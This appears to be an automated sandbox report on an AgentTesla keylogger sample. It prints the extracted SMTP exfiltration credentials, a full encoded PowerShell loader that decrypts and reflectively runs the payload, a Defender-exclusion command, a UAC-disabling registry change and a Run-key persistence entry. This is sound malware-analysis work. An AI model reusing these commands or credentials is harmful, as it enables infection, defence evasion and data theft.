agenttesla | 230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a

General

Target

230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe
Size

1.0MB
MD5

0bfde25a39f983c58a94d6ad2d95181e
SHA1

020285c7a771bb2f5e81badf92b558ae97932348
SHA256

230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a
SHA512

a864bdbfcdb55f6f574ca37a7d57a43ce382044dffc5eca7f1e87f79a97776f4fb9e9b984a4ad001ca4aa1fb851f45531fb22d2a0b62f4fb157a42bbe6152bc0
SSDEEP

24576:a/rEUhxLdtH9iIFaqo8kVG8QBi2oMnWldVvyKy:azvdcIFaG8//MUyf

Score

10^/10

agenttesla evasion execution keylogger persistence spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
smtp.privateemail.com
Port:
587
Username:
[email protected]
Password:
alibabawork@123

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.privateemail.com
Port:
587
Username:
[email protected]
Password:
alibabawork@123
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

powershell.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe

Windows security bypass 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe = "0"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

4976 powershell.exe
2144 powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

jsc.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FXBfh = "C:\\Users\\Admin\\AppData\\Roaming\\FXBfh\\FXBfh.exe"	jsc.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

28 api.ipify.org
29 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4976 set thread context of 1956 4976 powershell.exe jsc.exe

flow	ioc
28	api.ipify.org
29	api.ipify.org

description	pid	process	target process
PID 4976 set thread context of 1956	4976	powershell.exe	jsc.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exejsc.exe

pid	process
4976	powershell.exe
4976	powershell.exe
4976	powershell.exe
4976	powershell.exe
4976	powershell.exe
4976	powershell.exe
4976	powershell.exe
4976	powershell.exe
2144	powershell.exe
2144	powershell.exe
2144	powershell.exe
1956	jsc.exe
1956	jsc.exe
1956	jsc.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exejsc.exe

description pid process

Token: SeDebugPrivilege 4976 powershell.exe
Token: SeDebugPrivilege 2144 powershell.exe
Token: SeDebugPrivilege 1956 jsc.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

jsc.exe

pid process

1956 jsc.exe

description	pid	process
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	1956	jsc.exe

pid	process
1956	jsc.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exepowershell.exe

description	pid	process	target process
PID 1092 wrote to memory of 4976	1092	230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe	powershell.exe
PID 1092 wrote to memory of 4976	1092	230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe	powershell.exe
PID 4976 wrote to memory of 2144	4976	powershell.exe	powershell.exe
PID 4976 wrote to memory of 2144	4976	powershell.exe	powershell.exe
PID 4976 wrote to memory of 4416	4976	powershell.exe	regasm.exe
PID 4976 wrote to memory of 4416	4976	powershell.exe	regasm.exe
PID 4976 wrote to memory of 4416	4976	powershell.exe	regasm.exe
PID 4976 wrote to memory of 1956	4976	powershell.exe	jsc.exe
PID 4976 wrote to memory of 1956	4976	powershell.exe	jsc.exe
PID 4976 wrote to memory of 1956	4976	powershell.exe	jsc.exe
PID 4976 wrote to memory of 1956	4976	powershell.exe	jsc.exe
PID 4976 wrote to memory of 1956	4976	powershell.exe	jsc.exe
PID 4976 wrote to memory of 1956	4976	powershell.exe	jsc.exe
PID 4976 wrote to memory of 1956	4976	powershell.exe	jsc.exe
PID 4976 wrote to memory of 1956	4976	powershell.exe	jsc.exe
PID 4976 wrote to memory of 628	4976	powershell.exe	jsc.exe
PID 4976 wrote to memory of 628	4976	powershell.exe	jsc.exe
PID 4976 wrote to memory of 628	4976	powershell.exe	jsc.exe

C:\Users\Admin\AppData\Local\Temp\230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe
"C:\Users\Admin\AppData\Local\Temp\230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEIAMwAsACAAMAB4ADkAMAAsACAAMAB4ADYARgAsACAAMAB4AEEAMAAsACAAMAB4AEQAOAAsACAAMAB4ADYAMwAsACAAMAB4AEQAMgAsACAAMAB4AEEANgAsACAAMAB4AEUAMwAsACAAMAB4ADQARAAsACAAMAB4ADYANwAsACAAMAB4AEYANwAsACAAMAB4ADUAMAAsACAAMAB4ADUAOQAsACAAMAB4ADYANAAsACAAMAB4AEYAMgAsACAAMAB4ADEANQAsACAAMAB4ADYAOAAsACAAMAB4ADgARgAsACAAMAB4AEUANQAsACAAMAB4AEYAMwAsACAAMAB4AEEANQAsACAAMAB4AEEAMQAsACAAMAB4ADcAMwAsACAAMAB4ADEARgAsACAAMAB4ADYAQgAsACAAMAB4ADMAMgAsACAAMAB4ADIANgAsACAAMAB4ADgARgAsACAAMAB4ADIARQAsACAAMAB4ADMAOAAsACAAMAB4ADUANgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA5ADQALAAgADAAeABGAEYALAAgADAAeABBADEALAAgADAAeAA0ADQALAAgADAAeAA4AEEALAAgADAAeAA3AEUALAAgADAAeABGADcALAAgADAAeAA5AEEALAAgADAAeABDADIALAAgADAAeAAzADgALAAgADAAeAAyAEUALAAgADAAeABGADEALAAgADAAeAA0ADYALAAgADAAeABFAEUALAAgADAAeABGAEEALAAgADAAeAAwAEMAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
2⤵
- UAC bypass
- Windows security bypass
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe" -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2144

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
3⤵
PID:4416

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1956

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
3⤵
PID:628

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Impair Defenses

2

T1562

Disable or Modify Tools

Modify Registry

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vochmuk0.ctn.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\file-29140.putik
Filesize
33KB

MD5
10f97ef3f035d5b8a83f74f0c3633797

SHA1
abd9f893e205fbbad8184e513d06e67a9642f651

SHA256
9702e4ea1ca9407c311a92252091f65f022a59c9261d712ab127ea667d331dc6

SHA512
5f7e69ace5466b60ddc0377651ab43790a321578bb015d014b2f753dcfeb9d2a88501ff5e2b6e6383fcf3f296c178ec74aef23dabe46ef75bc7b27431f8c2f2d

Download Submit
memory/1956-28-0x0000000000400000-0x0000000000444000-memory.dmp

Filesize
272KB

Download
memory/1956-39-0x0000000007360000-0x000000000736A000-memory.dmp

Filesize
40KB

Download
memory/1956-38-0x00000000073A0000-0x0000000007432000-memory.dmp

Filesize
584KB

Download
memory/1956-37-0x0000000007260000-0x00000000072FC000-memory.dmp

Filesize
624KB

Download
memory/1956-36-0x0000000007170000-0x00000000071C0000-memory.dmp

Filesize
320KB

Download
memory/1956-32-0x0000000005B10000-0x0000000005B76000-memory.dmp

Filesize
408KB

Download
memory/1956-29-0x0000000005F50000-0x00000000064F4000-memory.dmp

Filesize
5.6MB

Download
memory/2144-17-0x00007FFF7AF00000-0x00007FFF7B9C1000-memory.dmp

Filesize
10.8MB

Download
memory/2144-18-0x00007FFF7AF00000-0x00007FFF7B9C1000-memory.dmp

Filesize
10.8MB

Download
memory/2144-33-0x00007FFF7AF00000-0x00007FFF7B9C1000-memory.dmp

Filesize
10.8MB

Download
memory/4976-1-0x00007FFF7AF03000-0x00007FFF7AF05000-memory.dmp

Filesize
8KB

Download
memory/4976-16-0x00000252E8CE0000-0x00000252E8D78000-memory.dmp

Filesize
608KB

Download
memory/4976-34-0x00007FFF7AF00000-0x00007FFF7B9C1000-memory.dmp

Filesize
10.8MB

Download
memory/4976-15-0x00000252CFBD0000-0x00000252CFBDC000-memory.dmp

Filesize
48KB

Download
memory/4976-13-0x00007FFF7AF00000-0x00007FFF7B9C1000-memory.dmp

Filesize
10.8MB

Download
memory/4976-12-0x00007FFF7AF00000-0x00007FFF7B9C1000-memory.dmp

Filesize
10.8MB

Download
memory/4976-11-0x00000252E8A80000-0x00000252E8AA2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads